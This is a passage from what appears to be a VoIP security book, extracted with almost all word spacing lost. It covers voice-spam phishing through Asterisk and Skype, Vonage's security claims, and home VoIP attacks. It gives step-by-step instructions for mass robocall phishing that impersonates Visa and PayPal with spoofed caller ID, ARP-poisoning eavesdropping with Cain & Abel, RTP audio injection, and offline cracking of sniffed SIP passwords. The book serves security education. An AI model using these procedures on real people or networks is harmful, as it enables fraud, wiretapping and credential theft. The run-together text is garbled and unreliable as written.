executestothephonenumberlistedfortheaccountholder.Themessageusuallytellstheaccountholderthatsomeaberrantactivityhasbeendetectedandheshouldcallthecreditcardcompanyrightaway.However,anattackercancreateasimilarfrauddetectionvoicecallbutaskthepersontocallanumberofherchoice.Forexample,theattacker'sautomatedmessagecouldbe:"Hello,thisisanautomatedmessagefromVisaFraudDetectionServices.Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.Thismessagewillnowrepeat.Hello,thisisanautomatedmessagefromVisaFraudDetectionServices.Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.Thankyou."
ThefollowingsectionsshowafewwaystoperformSPIT.
SPITandtheCity
Theabilitytosendpre-recordedcallsoverVoIPisquiteeasy.WithVoIPinfrastructure,standardmessagingformatcanbeused.OpenPBXsystems,suchasAsterisk,canbeusedtoblastpre-recordedmessagestoindividualphonenumbersinmassquantity.Asteriskallowsuserstomakeasinglecallfileandsenditmanually.Thecallfilecanthenberepeatedlysenttoseveraldifferentphonenumbersoverashortperiodoftime.CompletethefollowingstepstosendspammessagesoverVoIPinfrastructure:
1. Recordthespammessage.Thiscanbeaccomplishedusingavarietyofmethods;forthisproofofconcept,wewilluseapre-recordedmessagein.mp3format.Usinganyvoicerecorder,recordthespammessageandsaveittoa.mp3file(e.g.,SPAM.mp3).
2. Afterthefilehasbeensaved,loadittothefollowingdirectoryonyourAsteriskserver:/var/lib/asterisk/mohmp3/SPAM.mp3.Ifyoudon'thavetimetorecordaspammessage,useanymusic.mp3fileforthisexample.
3. Createanextensionsequencetocallthetargetandplaythe.mp3filewhenthephoneisanswered.a. Edit/etc/asterisk/extensions.confbyaddingthefollowing
linesunderthetestrealm[test],whichwillcreateanextensionandreferencetheSPAM.mp3messagerecorded:
[test]exten=>s,1,Answerexten=>s,2,MP3Player(/var/lib/asterisk/mohmp3/SPAM.mp3)exten=>s,3,Hangup
4. Tocompletetheproofofconcept,wewillbeusingthefreeaccountcreatedearlierwithVoIPBuster.Pleasecompletethatsectionofthischapterbeforeproceedingtothenextstep.Insummary,besuretovisithttp://www.voipbuster.com/,createanaccount,andaddthefollowinginformationtoyoursip.conffile(whereUSERNAMEandPASSWORDaretheinformationyourprovidedtoVoIPBuster):
[voipbuster]type=peerhost=sip.voipbuster.comcontext=testusername=USERNAMEsecret=PASSWORD
5. Createthecallfileitself.Thecallfilewillbeusedtomanuallysendapre-recordedmessageusingAsterisk.a. Changedirectoriesto/var/spool/asterisk/tmp.b. Openatexteditor,suchasvi,andcreateacallfile
calledSPAM.Test.call.Thefirstlinewilllistthetargetedphonenumberto
sendyourspamto,whichisindicatedbythechannelinformation.ThechannelinformationwillusetheVoIPBusteraccountcreatedearlier.Forexample,thefirstlinewillbelistedasSIP/1-xxx-xxx-xxxx@voipbuster,wherexxx-xxx-xxxxshouldbereplacedbythe10-digitphonenumberofthetargetednumber(e.g.,SIP/14151182006@voipbuster).Ifthetargetedphoneis415.118.2006,thechannellinewilllooklikethefollowing:
Channel:SIP/14151182006@voipbuster
c. Addtherestoftheitemsbelow,whichincludethemaxretries,waittime,andpriority,tomakethecallfilework:
MaxRetries:5RetryTime:300WaitTime:45Context:testExtension:sPriority:1
6. Totestthecallfiletoensurethateverythingworked,restarttheAsteriskserver,whichensuresthattheupdatedextensions.conffilehasbeenloaded:
/etc/init.d/asterisk/restart
7. CopythenewlycreatedcallfiletoAsterisk'soutgoingfolder.Asteriskchecksthisfolderperiodicallytosendoutboundcalls.Withinafewmomentsofyourmovingthefile,Asteriskwillcall415.118.2006andplaythepre-recorded.mp3messagetotheuserwhensheanswersthephone:
mv/var/spool/asterisk/tmp/SPAM.Test.call/var/spool/asterisk/outgoing
Done!YouhavenowsenttheSPAM.mp3filetoyourtargeteduser.
Ifthecallwasmadesuccessfully,thentherealnastinesscanbegin.Asyoumayhavenoticed,thereisnothinguniqueabout
thecallfileexceptthephonenumberlistedonthefirstline.Asimplescriptcanbecreatedthatchangesthe10-digitphonenumberofthetargettoanyvaluethespammerwishes.Furthermore,thescriptcanbewritteninawaytocreateauniquecallfileforeachnumberbetween415.000.0000and415.999.9999.OncethesecallfileshavebeenmovedtotheoutgoingfolderandsentbyAsterisk,itcanthensendthepre-recordedSPAM.mp3filetoallthephonenumbersinSanFrancisco(415istheareacodeforSanFrancisco).Furthermore,theattackercouldusehisVoIPJetaccountinsteadofVoIPBusterandsettheCallerIDvaluetosomethingtrusted,suchasthelocalfiredepartmentnumber.Thiswouldmakethecallsappeartobeoriginatingfromatrustedsource,allowingthespammertoSPITonallthephonesinamajorcity.
LightweightSPITwithSkype/GoogleTalk
AnotherwaytoSPITonusersistouseSkype,GoogleTalk,orthehandfulofotherVoIPclientsthatsupportthevoicemailfeature.SkypeandGoogleTalkofferafeaturethatallowsavoicemailmessagetobesenttootherSkype/GoogleTalkusers.Similartosendingadvertisementemailtousers,thisfeaturecanbeabusedbySkype/GoogleTalkusers.Thefeatureallowsavoicemailtobesenttoanycontactinyourcontactlist.Unlikebulkemail,whichallowsasingleemailtobesenttoseveralthousandsusers,SkypeandGoogleTalkdonotsupportbulkvoicemail.Anattackerwouldhavetosendavoicemailtoeachtargetonebyone,thuslimitingthefeasibilityofthistypeofSPITactivitygiventhatvolumeisabigfactorwhenoneistryingtoadvertiseproductstousersviaspam.Regardless,toSPITonSkype/GoogleTalkusers,aphishercansendavoicemailthatsoundsasifitisfromalegitimatecreditcardcompany.Infact,withPayPalbeingahigh-profiletargetofemailphishers,andthefactthateBayownsbothPayPalandSkype,avoicemailfrom"PayPal"toaSkypeaccountcitingunauthorizedactivityandrequestingimmediateactionisprobablythenextwaveofattacks.AsampleSkypephish
attemptmayhavethefollowingspeech:"DearCustomer:Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.TheactivityinquestionseemstoabusingbothyourPayPalandeBayaccountsatthistime.Thankyou,PayPalTrustandSafety."
CarryoutthefollowingstepstocompleteaproofofconceptofSPITwithSkype:
1. DownloadSkypefromhttp://www.skype.com/orGoogleTalkfromhttp://www.google.com/talk/.
2. AcquireSkypeVoicemail,whichcanbepurchasedforUS$6.00,orGoogleTalkVoicemail,whichisfree.
3. OpenNotepadandcopythepreviousphishingtextintoanewfile.
4. OpenWindowsSoundRecorder(Start►Programs►Accessories►SoundRecorder).
5. OpenWindowsNarrator(Start►Programs►Accessibility►Narrator).
6. ClickSoundRecorder'sRecordbutton.7. WhenNarratorbeginstospeakwords,givetheNotepad
filethefocus.Thissteprecordsthephishingtextintoacomputervoice,mimickingtheautomatedcallsmadebycreditcardcompanies.
8. ClickSoundRecorder'sStopbuttonafterNarratorfinishesthephishingtext.SavethefileasSPIT.wav.
9. TouseSkypeand/orGoogleTalktoSPIT:a. Right-clicktheusertowhomyouwishtosendaSPIT
voicemail.b. Waitfortheuser'svoicemailboxtostartrecording.c. PlaytheSPIT.wavfilefromyourmachine.
Done!Youhavejustsentaspamvoicemailmailusing
Done!Youhavejustsentaspamvoicemailmailusingcomputer-automatedtexttoatargetedVoIPuser.Asyoumayhavenoticed,theexampleshowsanunsophisticatedmethodofspammingVoIPusers.Aswitheveryothersectionofthischapter,theproofofconceptistoshowhoweasilySPITcanbeperformed,butnottoshowtherecipefordisaster.ArealSPITmethodologywouldimprovethepreviousexamplebyusingabettercomputer-automatedvoice(suchasoneproducedbyAsteriskFestival)andsendingbulkvoicemailswithasingleaudiofile(usingscriptingorsomeotherautomateddeliverymethod).
SummaryAsyouhavenodoubtnoticedfromthischapter,manyunconventionalattacksarepossiblewithVoIPinfrastructure.Thedescriptionsofmanyoftheseattacksinthischapterhaveshownthemostseverecases,whichallowanyusertodownloadtheAsteriskPBXsystemandwithinafewmomentsplaygamesontrusteddevicesinourhomesandoffices(landlinesandmobilephones,aswellasVoIPphones).VoIPtechnologyhasalongwaytogointermsoftrustboundariesandsecurityguarantees,becauseabuseofthesystemisnotactivelydefendedagainstorsecured.Historytellsusthatwhenabuseisallowedandcanleadtofinancialgain,suchaswithemailtechnologies,attackerswillnothesitatetotakeadvantageoftheopportunity.Unfortunatelyfortherestofus,thetrustofitemsweoncefeltverysecureaboutcannolongerbeguaranteed,whetherthatistheCallerID,anaccountrepresentativefromyourcreditcardcompany,orsimplyavoicemail.
Chapter8.HOMEVOIPSOLUTIONSHomeVoIPsolutionshavebeengainingpopularityformanyyears.FromearlysolutionslikeNet2PhonetothepopularityofPC-basedVoIPsolutionslikeSkypeandallthewaytotraditionalphonesusingVoIPsolutionslikeVonage,homeVoIPuseisontherise.WhiletheInternethasallowedtelephonecallsoverIPprotocolsformanyyears,notuntilabout2005didweseeatruefootholdinthehomemarket.ManyaspectsofVoIPsolutionsappealtothehomeuser,includingtherisingcostoftraditionalhomephones,thegrowingdisuseoflandlinesinfavorofmobilephones,andthe"geek"factorofbeingabletousethecomputerforeverything,includingmakinginexpensivetelephonecallstofriendsandfamily.WhileVoIPathomeisacheap,fun,andeasy-to-usemethodforplacingtelephonecalls,itcomeswithafewdisadvantages.Forexample,ifyourhomevoicesolutionisPC-based,apoweroutagecanleaveyouwithoutaphone(becauseyoucan'tconnecttotheserviceswithoutelectricitytopoweracomputer).Furthermore,traditional911servicesmaynotbeavailablewithmanyPC-basedVoIPclients,suchasSkype,Yahoo!,andGoogle,becausemanyVoIPsolutionscannotprovideacaller'sphysicaladdress,whichisarequirementfortheuseof911calls.Callqualitycanalsobeanissueattimes.WhilesomeVoIPserviceshavehighquality,thetechnologyisstillprettyinconsistent.Forexample,Skype'scallqualityhasimproved,buttheservicestillleavesmuchtobedesiredintermsofconsistentqualityoneverycall.Thefinaldisadvantage,whichismostpertinenttothischapter,istherelativelackofsecurity.Whilelandlinesarenotcheap,cooltouse,orflexible,theyprovidealayerofintrinsicsecurityandtrust.Landlinesecurityisbeyondthescopeofthischapter,butnoonecandisputethatmostusersplaceaconsiderableamountoftrustinlandlinecallsfromthecasualattacker.Peopleprobablyexpectthegovernmenttobeabletotaptheir
phonelines,buttheydonotexpectthatany15-year-oldontheInternetwillbeabletodoso,whichiswhereVoIPaddsdanger.Bythispointinthebook,though,youshouldbewellawarethatsecurityandtrustareVoIP'sprimaryliabilities,andthesameproblemsapplytohomeVoIPsolutions.ThischapterevaluatesthesecurityofhomeVoIPsolutions,includingcommercialVoIPsolutions,PC-basedVoIPsolutions,andsmalloffice/homeoffice(SOHO)phonesolutions.Thefollowinglistdescribestheproductscoveredineachcategory:
CommercialVoIPsolutions
VonagePC-basedVoIPsolutions
Yahoo!MessengerGoogleTalkMicrosoftLiveMessengerSkype
SOHOphonesolutions
ProductsfromcompanieslikeLinksys,Netgear,andD-Link
Itshouldbenotedthatmanyoftheprotocolsusedbycommercial,PC-based,and/orSOHOVoIPsolutionshavebeenalreadydiscussedinthisbook,specificallyintheSIPandRTPchapters(ChaptersChapter2andChapter4,respectively).AllattacksshownintheSIPandRTPchaptersapplytoeachVoIPproductthatusesthoseprotocols,regardlessofwhetheritisYahoo!MessengerorVonage.Whilethischapterwillnotnecessarilyreiterateinformationprovidedinpreviouschapters,we'llbespecificallydiscussingthesecuritystrengthsandweaknessesofeachhomeVoIPsolution,andthefamiliarmaterialwillhelptoprovidecontext.
CommercialVoIPSolutions
CommercialVoIPsolutionshavebeengrowingrapidlyoverthepastseveralyears,withcompanieslikeVonageprovidingcustomerswithtraditionalphoneservicesovertheInternet.UnlikePC-to-PCcallingorthehybridsolutions(PC/hardphone),VonagedoesnotrequireanysoftwareonaPCforthesystemtorun.WhileVonageuserscanmakeuseofoptionalsoftware,thesystemrequiresonlyabasestationthatconnectstoahometelephonejackandanEthernetcable.Infact,homeuserscanusetheirexistingPSTNphones(publicswitchedtelephonenetwork,whichisatraditionallandline)withtheVonagesolution,requiringnohardVoIPdevice.WhileVonageandotherprovidersofferalowerpackagepriceforhomephoneservicesthantraditionaltelephonecompanies,thesecurityoftheVonageVoIPcallmustbeconsidered.EventhoughtraditionalPSTNlandlinesdonotnecessarilysecureauser'stelephonecall,[12]onestillassumesacertainamountoftrustwhenusingahomephone.ThesecurityimplicationsofVonagearenodifferentfromthoseassociatedwithpreviouslydescribedinsecureprotocols,suchasSIPandRTP,buttheattackprocessisslightlychanged.
Vonage
AccordingtoVonage'swebsite,VoIPcallsusingtheVonageservicearesecure.Infact,thecompanystatesthataVonagecallisactuallymoresecurethanacallmadeviaatraditionalPSTNline.[13]Thecompanycontinuestostatethatanattackercannotsimplysniffthewireorredirectaconversationelsewhere.Theseareveryboldsecuritystatementsthatrequiresignifcantsupport,solet'sseeiftheyaretrue.AtypicalVonagearchitecturesetupisshowninFigure8-1.
Figure8-1.VonageVoIPsetup
Unfortunately,VonageisnotmoresecurethanPSTNlinesandisvulnerabletoseveralVoIPsecurityattacks.Specifically,everyattackdiscussedintheSIPandRTPchapterscanbeappliedtoVonage.ItisquitesurprisingtoseeVonagemakesuchboldsecuritypromiseswithsolittleevidencetobackthemup.BothsessionsetupviaSIPandmediatransferviaRTParewideopentoattacks.InVonage'sdefense,attacksfromtheInternethaveasmallattacksurface.Figure8-2showsthreemainattacksurfacesofVonage.
Figure8-2.AttackingaVonageVoIPnetwork
InordertofurtherdefineVonage'sattacksurface,thefollowinglistdescribestheprobabilitiesofeachattack.Probabilityhereismeasuredintermsofthelikelihoodthatanattackwouldbesuccessfulinthegivenenvironment.HighprobabilityInternalattackerswhohaveaccesstoauser'shome(e.g.,spouse,child,parent,roommate,roommate'sboyfriendorgirlfriend)MediumprobabilityVonagesystemsconnectedtohomewirelessnetworksthatareaccessibletoneighborsandwardriversLowprobabilityExternalattackerswhoareabletosniffthenetworkinthecorrectsegmentWhileinternalattackersmaybeastrongtermforafamilymemberorroommate,mostindividualsmakeoccasionalcallsthataspouse,child,parent,orroommateshouldnotbelisteningto.Whetherthecallhastodowithasurprisepartyforarelative,asecretthatneedstobehiddenfromone'sparents,oraroommate'sorderingpizzaandgivingacreditcardnumber,somethingsjustrequireprivacy.Thewirelessattacksurfaceisprobablyabiggerconcern,
becausemanypeopleusewirelesshubsfromLinksys,Netgear,andD-Linkintheirhomes.Whiletheconvenienceofwirelessnetworkingisgreat,thesecurityprotectionsonhomewirelessdevicesareterrible.Mosthomewirelessnetworksaresetupverypoorlyintermsofsecurity.Forexample,asmallnumberofhomeusersdeploywirelessdeviceswithnoencryption,allowingattackersintheneighborhoodtoconnectandseealltrafficthatissentincleartext.SomeusersenableWiredEquivalentPrivacy(WEP)encryptionontheirwirelessdevices,butanattackercancrackWEPinabout30minutesorless.Anewersolution,Wi-FiProtectedAccess(WPA),isbeingusedmoreandmoretoreplaceWEP,butofflinedictionaryattacksonWPAcanbeperformedquiteeasilywithtoolslikeCain&Abel.Theuseofeitheroftheseformsofencryptionallowsanexternalattacker,suchasaneighbororevenanywardriverwithastrongwirelessantenna,tosniffthetrafficandeavesdroponauser'sVoIPcalls.Thefinalscenarioistheonewiththemostdifficultattacksurface,butitshouldstillbetakenintoconsiderationwhenaddressingsecurity.BecauseVonagetrafficissentincleartext,anymalicioususerontheDSL/cablesegmentcansniffthetrafficandviewthecallinformation.AnattackerinRussiawhoistargetingauserinCaliforniawillhaveatoughtimetargetingthespecificnetworksegment;however,anattackerwhousesthesamebroadbandproviderasanotherVonageusercouldsniffthesegmenteasily.Furthermore,limitedaccesstothenetworksegmentdefinitelyreducestheattacksurface,andengaginginvoicecommunicationthattraversesthenetworkincleartextisnotagoodpolicy.Asananalogy,mostInternetuserswouldnotpurchaseanitemonlineunlessencryption(SSL)werebeingperformedbythewebbrowser.Usersaretrainedtolookforthesecuritylockontheirwebbrowser(orthepresenceofanhttpsinsteadofanhttpinthebrowser'saddressbar)toassurethemthatanytransactionorcommunicationbetweenthemandAmazon,eBay,PayPal,ortheirbank'swebsiteis100percentencryptedandthussecure.However,aVonageuserwhogiveshiscreditcardnumberover
thephonetopayforapizzahasjustsentallthatcreditcardinformationovertheInternetincleartext,whichistheequivalentofmakingacreditcardpaymentinthewebbrowserwithoutthereassuranceofSSL.Inordertoshowthesecurityissuesfirst-hand,thenextsectionwillshowhowanattackerwouldperformSIPandRTPattacksonaVoIPsolutionthatusesVonage.ManyoftheseattackshavealreadybeenexplainedintheSIPandRTPchaptersbutwillbecustomizedheretoapplyspecificallytoaVonageenvironment.Furthermore,onlySIP/RTPdemonstrationsthatattackahomeuser'snetworkorequipmentwillbeshown,asattackinganyVonageinfrastructureisillegal.ThefollowingattackscanbeinitiatedonanyoftheattacksurfacesshowninFigure8-2:
Calleavesdropping(RTP)Voiceinjection(RTP)Username/passwordretrieval(SIP)
CallEavesdropping(RTP)
RTPisacleartextprotocol,whichmeansitcanbesniffedoverthenetworklikeothercleartextprotocolssuchastelnet,FTP,andHTTP.WhilesniffingRTPpacketsisaseasyassniffingtelnetpackets,gettingusefulinformationisnotquiteassimple.VoiceconversationsusingRTPconsistofacollectionofaudiopackets,witheachpacketcontainingacertainpartoftheaudiocommunicationfromoneendpointtotheother.CapturingasingleRTPpacketwillgivetheattackeronlyasingleaudiosliceofalongerconversation.AneasywaytosolvethisissuewithoutaddingmorecomplexityistouseatoollikeCain&AbelorWireshark.Thesetools,aswellasothers,cancaptureasequenceofRTPpackets,reassembletheminthecorrectorder,andsavetheRTPstreamasanaudiofile(e.g.,a.wavfile)usingthecorrectaudiocodec.Inthisway,anypassiveattackercansimplypoint,click,and
eavesdroponalmostanyVoIPcommunication.Performingaman-in-the-middleattackhelpsensurethesuccessofVoIPeavesdropping,becauseitforcestargetstosendtheirpacketsthroughanattackeronthelocalsubnet.Forexample,let'ssaytwotrustedparties,SoniaandKusum,wanttocommunicateviatelephone.InordertocommunicatewithKusum,Soniadialsherphonenumber.WhenKusumanswersthephone,SoniabeginshercommunicationprocesswithKusum.Duringaman-in-the-middleattack,anattackerinterceptstheconnectionbetweenSoniaandKusumandactsasarouterfortheconnection.Thisforcesthetwoendpointstoroutethroughanunauthorizedthirdparty.BothKusumandSoniacanstillcommunicate;however,neitherofthemwillbeawarethatanunauthorizedthirdpartyislisteningtoeverywordoftheirconversation.Theattackislikehavingathree-wayphonecallinwhichtwoofthethreecallersareunawareofthepresenceofthethirdparty.Figure8-3showsahigh-levelexampleofaman-in-the-middleattack.
Figure8-3.Man-in-the-middleattack
Note✎
Formoreinformationonman-in-the-middleattacks,refertoChapter4.
InordertocaptureVonageRTPpackets,reassemblethem,anddecodethemto.wavfilesusingthecorrectcodec,allthewhileperformingaman-in-the-middleattack,anattackermightusetheverypopulartoolCain&Abel.Tocarryoutaman-in-the-middleattackaccordingtoFigure8-3withCain&Abel,anattackerwouldperformthefollowingsteps:
1. DownloadCain&Abel,writtenbyMassimilianoMontoro,fromhttp://www.oxid.it/cain.html/.
2. Installtheprogramusingitsdefaults.InstalltheWinPCappacketdriveraswellifoneisnotalreadyinstalled.
3. LaunchCain&Abel(Start►Programs►Cain).4. Clickthegreeniconintheupperleft-handcornerthat
lookslikeanetworkinterfacecard.TheattackerwillwanttocheckthatherNICcardhasbeenidentifiedandenabledcorrectlybyCain&Abel.
5. SelecttheSniffertab.6. Clickthe+symbolonthetoolbar.TheMACAddress
Scannerwindowwillappear.ThiswillenumeratealltheMACaddressesonthelocalsubnet.
7. ClickOK.SeeFigure8-4fortheresults.
Figure8-4.MACAddressScannerresults
8. SelecttheAPRtabonthebottomofthetooltoswitchtotheARPPollutionRoutinginterface.
9. Clickthe+symbolonthetoolbartoshowalltheIPaddressesandtheirMACs.SeeFigure8-5.
Figure8-5.IPaddressesandtheirMACs
10. Ontheleft-handsideofthedialogshowninFigure8-5,choosethetargetfortheman-in-the-middleattack.Mostlikelythiswillbethedefaultgatewayintheattacker'ssubnetsoallpacketswillgothroughherfirstbeforetherealgatewayofthesubnet.
11. Oncetheattackerhaschosenhertarget,whichisthegatewayIPaddress172.16.1.1inourexample,sheselectstheVoIPendpointsontherightsidethatshewantstointercepttrafficfrom,suchastheVonagebasestation.IfshedoesnotknowwhichIPaddressistheVonagedevice,shesimplyselectsalltheIPaddressesontheright-handside.Figure8-6showsmoredetail.
Figure8-6.Man-in-the-middletargets
12. Selecttheyellow-and-blackicon(thesecondonefromtheleftonthemenubar)toofficiallystarttheman-in-the-middleattack.TheuntrustedthirdpartywillstartsendingoutARPresponsesonthenetworksubnet,whichwilltell172.16.1.119thattheMACaddressof172.16.1.1hasbeenupdatedto00-00-86-59-C8-94.(SeeFigure8-7.)
Figure8-7.Man-in-the-middleattackinprocesswithARPpoisoning
Atthispoint,alltrafficonthelocalnetworkisgoingtotheuntrustedthirdpartyfirstandthenonitsappropriateroute.TheattackercanthenuseCain&Abel,whichprovidesaVoIPsniffer,tocaptureRTPpacketsandreassembletheminto.wavfilesthatcanbeopenedwithWindowsMediaPlayer.
13. OnceaVonageuserplacesaphonecall,completethefollowingstepstoviewthecapturedaudioinformation:a. SelecttheSniffertabonthetoprowb. Onthebottomrow,selectVoIP.IfVoIPcommunication
hasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemin.wavformat.AsshowninFigure8-8,Cain&Abelhascapturedafewphoneconversationsoverthenetworkusingafewsimplesteps.
Usingaman-in-the-middleattackandCain&Abel'sdefaultVoIPsniffer,anattackercaneasilycapture,decode,andrecord
allthevoicecommunicationonaVonagenetwork.
Figure8-8.CapturedVoIPcommunicationviaRTPpackets
VoiceInjection(RTP)
RTPisthemedialayerusedbyVonage.InadditiontoweaknessesthatallowVoIPeavesdropping,RTPisalsovulnerabletoinjectionattacks.InjectionattacksallowmaliciousentitiestoinjectaudiointoexistingVoIPtelephonecalls.Forexample,anattackercouldinjectanaudiofilethatsays"Sellat118"betweentwostockbrokersdiscussinginsidertradinginformation.ToinjectaudiobetweentwoVoIPendpoints,RTPpacketsthatmirrortimestamp,sequence,andSSRCinformationoftherealRTPpacketsmustbeused.Forexample,inagivenRTPsession,thetimestampusuallystartswith0andincrementsbythelengthofthecodeccontent(e.g.,160ms),thesequencestartswith0andincrementsby1,andtheSSRCisusuallyastaticvalueforthesessionandafunctionoftime.Allthreeofthesevaluesareeitherpredictableinnatureorstatic.Theabilitytogatherthecorrecttimestamp,sequence,andSSRCinformationcanbequiteeasybecausealloftheinformationtraversesthenetworkincleartext.Anattackercansimplysniffthenetwork,readtherequiredinformationforhisattack,andinjecthisnewaudiopackets.Furthermore,becausetheinformationisnotrandom,atoolhasbeenwritten(describedinthissection)toautomatetheprocessandrequirelittleeffortfromtheattacker.Figure8-9showsanexampleoftheRTP
injectionprocess.
Figure8-9.RTPinjection
Noticethattheattacker'sSSRCnumberisthesameasitstarget's,butitssequencenumberandtimestampareinsyncwiththelegitimatesession(increasingaccordingly).Thismakestheendpointassumethattheattacker'spacketsarepartoftherealsession.InordertoinjectaudiointoVoIPnetworksthatuseRTP,anattackershoulduseRTPInject,atoolthatautomatestheactionsneededtoinjectpacketsintoanexistingaudiostream.Itautomaticallymakestheappropriatechangestothetimestamp,sequence,andSSRCvaluesonbehalfoftheuser.Theonlyrequirementistheaudiofiletobeinjected;however,RTPInjectcomeswithanexampleaudiofilebydefault(forproofofconceptpurposes).InordertoinjectaudiointoanexistingVoIPcall,anattackerwouldcompletethefollowingsteps:
1. DownloadRTPInject,writtenbyZaneLackeyandAlexGarbutt,fromhttp://www.isecpartners.com/tools.html/.FollowtheReadme.txtfileforusageonaWindowsmachine.TheLinuxversionofRTPInjectdependsonthefollowingpackages,whicharepre-installedonmostmodernLinuxsystems,suchasUbuntu,RedHat,andtheBackTrackLive
CD(youmustalwaysrunitwithrootprivileges):Python2.4orhigherGTK2.8orhigherPyGTK2.8orhigher
2. InstallthepypcaplibraryincludedwithRTPInjectbyusingthefollowingcommands:
bash#tarzxvfpypcap-1.1.tar.gzbash#cdpypcap-1.1bash#makeallbash#makeinstall(*Note:Thisstepmustbeperformedasroot.)
3. InstallthedpktlibraryincludedwithRTPInjectbyusingthefollowingcommands:
bash#tarzxvfdpkt-1.6.tar.gzbash#cddpkt-1.6bash#makeinstall
4. Performaman-in-the-middleattackonthenetwork(ifnecessary)usingdsniff(Linux)orCain&Abel(Windows),asdescribedearlierinthischapter,inordertocaptureallRTPstreamsinthelocalsubnet.
5. LaunchRTPInjectusingthefollowingcommand:bash#pythonrtpinject.py
OnceRTPInjectisloaded,itwillshowthreefieldsinitsprimaryscreen,includingtheSourcefield,theDestinationfield,andtheVoiceCodecfield.SeeFigure8-10.TheSourcefieldwillbeauto-populatedasRTPInjectsniffsRTPstreamsonthenetwork.
6. WhenanewIPaddressappearsintheSourcefield,clickit;itwillthenshowthedestinationVoIPphoneandthevoicecodecbeingusedinthestream.
Figure8-10.RTPInjectmainwindow
7. BecauseRTPInjectdisplaysthevoicecodecinuse,theattackercancreatetheaudiofilewiththepropercodecshewishestoinject.UsingWindowsSoundRecorderorSoxforLinux,createanaudiofileinthefileformatshownbyRTPInject,suchasA-Law,u-Law,GSM,G.723,PCM,PCMA,and/orPCMU.a. OpenWindowsSoundRecorder(Start►Programs►
Accessories►Entertainment►SoundRecorder).b. ClicktheRecordbutton,recordtheaudiofile,andthen
clicktheStopbutton.c. SelectFile►SaveAs.d. SelectChange.UnderFormat,selectthecodecthatwas
displayedinRTPInject.SeeFigure8-11.(BothWindowsSoundRecorderandLinuxSoxaudioutilitiesprovidetheabilitytotranscodeanysourceaudiotoanothertype.)
Figure8-11.WindowsSoundRecordercodec
e. ClickOKandthenselectSave.8. OncethisaudiofilehasbeencreatedusingWindowsSound
RecorderorSox,clickthefolderbuttononRTPInjectandnavigatetothelocationofthefilerecordedinstep6(depictedinFigure8-12).
Figure8-12.Selectdialog
9. WiththeRTPstreamandaudiofileselected,clicktheInjectbutton.RTPInjecttheninjectstheselectedaudiofileintothedestinationhostintheRTPstream,asshowninFigure8-13.
Figure8-13.InjectingaudiowithRTPInject
Username/PasswordRetrieval(SIP)
VonageusesSIPforsessionsetup.InorderforausertoplaceaphonecallonVonage,hisbasestationmustauthenticateappropriately.AsnotedinChapter2,SIPusesdigestauthentication,whichisvulnerabletoabasicofflinedictionaryattack.Inordertoperformanofflinedictionaryattack,theattackerneedstosnifftheusername,realm,Method,URI,nonce,andtheMD5responsehashoverthenetwork,allofwhichisavailabletoheroverthenetworkincleartext.Oncethisinformationhasbeenobtained,theattackertakesadictionarylistofpasswordsandinsertseachoneintothepreviousequations,alongwithalltheothercaptureditems.Oncethishasbeendone,theattackerwillhavealltheinformationsheneedstoperformtheofflinedictionaryattackwithease.Theinformationtoperformanofflinedictionaryattackisavailabletoapassiveattackerfromtwopackets:thechallengepacketfromtheSIPserverandtheresponsepacketbythe
UserAgent.ThepacketfromtheSIPserverwillcontainthechallengeandrealmincleartext,whilethepacketfromtheUserAgentwillcontaintheusername,method,andURIincleartext.Atthispoint,anattackercanthentakeapasswordfromherdictionary,concatenateitwiththeusernameandrealmvalues,andcreatethefirstMD5hashvalue.Next,theattackercantaketheMethodandURIsniffedoverthenetworkinordertocreatethesecondMD5hashvalue.Oncethetwohasheshavebeengenerated,theattackerwillthenconcatenatethefirstMD5,thenoncesniffedoverthenetwork,andthesecondMD5hashvalueandcreatethefinalResponseMD5value.IfthisresultingMD5hashvaluematchestheResponseMD5hashvaluesniffedoverthenetwork,thentheattackerknowsthatshehasbrute-forcedthecorrectpassword.IftheMD5hashvaluesdonotmatch,thentheattackermustrepeattheprocesswithanewpassworduntilshereceivesahashvaluethatmatchestheonethatwascapturedoverthenetwork.Unlikeanonlinebrute-forceattack,wheretheattackermayhaveonlythreeattemptsbeforealockout,theattackercanperformtheofflinetestforanindefinitenumberoftimesuntilshehascrackedthepassword.Foradeeperunderstandingoftheauthentication,refertoChapter2.Inordertoacquireauser'sVonageSIPpasswordusingCain&AbelandSIP.Tastic,anattackerwouldperformthefollowingsteps:
1. Repeatsteps1through13from"CallEavesdropping(RTP)"onCallEavesdropping(RTP).
2. OnceaVonageuserplacesaphonecall,completethefollowingstepstofindandsnifftherequiredinformationinordertobrute-forcethepassword:a. SelecttheSniffertabonthetoprow.b. SelectthePasswordstabonthebottomrow.c. HighlightSIPontheleftpane,asshowninFigure8-14.
Figure8-14.CapturedSIPinformation
3. NowthattherequiredSIPauthenticationinformationhasbeencapturedoverthenetwork,downloadSIP.Tastic(SIP.Tastic.exe)fromhttp://www.isecpartners.com/tools.html/.
4. LaunchSIP.TasticfromtheStartmenu(Start►Programs►iSECPartners►SIP.Tastic►SIP.Tastic).
5. EnterintothetooltheSIPinformationthathasbeensniffedfromCain&AbelinFigure8-14:
Dictionaryfile:isec.dict.txtUsername:16505871532Realm:69.59.242.86Method:REGISTERURI:sip:f:voncp.com:10000Nonce:230948039MD5ResponseHashValue:b56ce72431cdff8d6e6539afecac522c
Ifthepasswordislistedinthedictionaryfile,thetoolwillshowtherevealedpasswordwithinafewminutes,asshowninFigure8-15.
[12]Recalltheeventsof2006,whenlargeorganizationslikeQwestandAT&TgavethousandsofphonerecordstogovernmentagenciesliketheNationalSecurityAgency.[13]Seehttp://www.vonage.com/help.php?article=1033&category=127&nav=102&refer_id=OLNSRCH170307/
PC-BasedVoIPSolutionsPC-basedVoIPsolutionshavebeenanemergingtrendoverthepastseveralyears.AsPC-basedVoIPsolutionshavebecomeeasiertodevelopandmorepopular,almosteveryonlinecompanyhasshippedapeer-to-peerVoIPclient.LargeorganizationsincludingGoogle,Microsoft,Yahoo!,EarthLink,andevenNero,whichmakesCD/DVDburningsoftware,haveallreleasedVoIPclientsforthePC.ThissectionwilldiscussthesecurityofthemostpopularPC-basedVoIPsolutions.
Figure8-15.CrackedVonagepasswordusingSIP.Tastic
Yahoo!Messenger
